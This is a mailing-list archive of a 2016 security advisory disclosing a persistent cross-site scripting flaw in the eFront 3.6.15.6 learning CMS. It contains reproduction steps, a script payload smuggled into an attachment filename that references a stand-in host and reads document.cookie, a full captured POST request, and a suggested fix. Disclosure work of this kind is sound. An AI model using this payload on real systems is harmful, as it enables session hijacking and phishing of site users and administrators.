[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] =?utf-8?b?ZUZyb250IDMuNi4xNS42IENNUyDigJMgKE1lc3NhZ2UgQXR0?= =?utf-8?q?achment=29_Persistent_Cr
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2016-02-24 10:38:11
Message-ID: 56CD8813.8090706 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
eFront 3.6.15.6 CMS – (Message Attachment) Persistent Cross Site Scripting Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1765
Release Date:
=============
2016-02-24
Vulnerability Laboratory ID (VL-ID):
====================================
1765
Common Vulnerability Scoring System:
====================================
4
Product & Service Introduction:
===============================
eFrontPro is a powerful learning management system that provides effective employee training \
that fits your brand preferences for both, online training & blended learning. eFrontPro can \
help you improve employee learning & development, ensure compliance, track employee training, \
engage your workforce and support organizational goals. Trusted by hundreds of companies and \
organizations around the world, eFrontPro is committed to assist you train people.
(Copy of the Homepage: http://www.efrontlearning.net/ )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered an application-side validation \
web vulnerability in the eFront eLearning v3.6.15.6 CMS.
Vulnerability Disclosure Timeline:
==================================
2016-02-24: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official \
eFront eLearning v3.6.15.6 Content Management System. The vulnerability allows remote attacker \
to inject own malicious script codes to the application-side of the vulnerable module/function \
context.
The vulnerability is located at the `message attachment file` value of the `file upload` \
module. Remote attackers are able to inject malicious script codes to the file upload message \
module POST method request to compromise the `message` module. The attack vector of the \
vulnerability is located on the application-side of the product and the request method to \
inject is POST. The execution point is the vulnerable `message` Module.
Exploitation of the persistent web vulnerability requires a low privileged web application user \
account and low user interaction (click or forward). Successful exploitation of the \
vulnerability results in session hijacking, persistent phishing, persistent external redirects, \
persistent load of malicious script codes or persistent web module context manipulation.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] efront CMS - Messages Module - message attachment (Image)
Vulnerable Parameter(s):
[+] attachment
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low \
privileged web-application user account and low user interaction. For security demonstration or \
to reproduce the security vulnerability follow the provided information and steps below to \
continue.
Manual steps to reproduce the vulnerability ...
1. Register an Efront CMS account and login to the web-application
2. Open link ../student.php?ctg=messages&add=1
3. send message button
4. Upload image with name "><img src="http://evilsource.localhost:8080" \
onerror=alert(document.cookie)>.jpg 5. after upload directly pick up a recipient and send the \
message 6. the execution of the vulnerability occurs at message module user panel or admin \
panel 7. Successful reproduce of the vulnerability!
--- PoC Session Logs [POST] ---
POST /efront/www/student.php?ctg=messages&add=1 HTTP/1.1
Host: host.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://lawrencelab.byethost18.com/efront/www/student.php?ctg=messages&add=1
Cookie: display_all_courses=1; PHPSESSID=b8b6af376a0d0cd87c16622; \
__test=b80983dafef045e957b8be0ceb; PHPSESSID=b8b6af376a0d076cacd87c16622; \
parent_sid=b8b6af376a0ffa76cacd87c16622
Connection: keep-alive
Content-Type: multipart/form-data; \
boundary=---------------------------206452991920433123311648543799
Content-Length: 5642
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="_qf__new_message_form"
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="previous_url"
http://lawrencelab.byethost18.com/efront/www/student.php?ctg=messages
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10485760
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="qfS_csrf"
7d69af83ffcff276f553044059274a50
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="recipient"
Administrator S. (admin)
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="bcc"
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="recipients"
only_specific_users
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="specific_course_completed"
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="user_type"
student
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="subject"
Hey check it
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="body"
please see attachments
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="attachment[0]";
filename="[PERSISTENT INJECTED SCRIPT CODE!]"><img src="http://evilsource.localhost:8080" \
onerror=alert(document.cookie)>.jpg"
Content-Type: image/jpeg
-----------------------------206452991920433123311648543799
Content-Disposition: form-data; name="submit_send_message"
Send message
-----------------------------206452991920433123311648543799--
Reference(s):
http://efront.localhost:8080/efront/
http://efront.localhost:8080/efront/www/
http://efront.localhost:8080/efront/www/student.php
Solution - Fix & Patch:
=======================
Parse and encode the filename of the message attachments to prevent persistent script code \
execution. Restrict the input and disallow usage of special chars as album name or filename \
value.
Security Risk:
==============
The security risk of the application-side input validation web vulnerability in the efront \
web-application is estimated as medium. (CVSS 4.0)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Lawrence Amer - \
http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any licenses, \
policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list, modify, use or \
edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic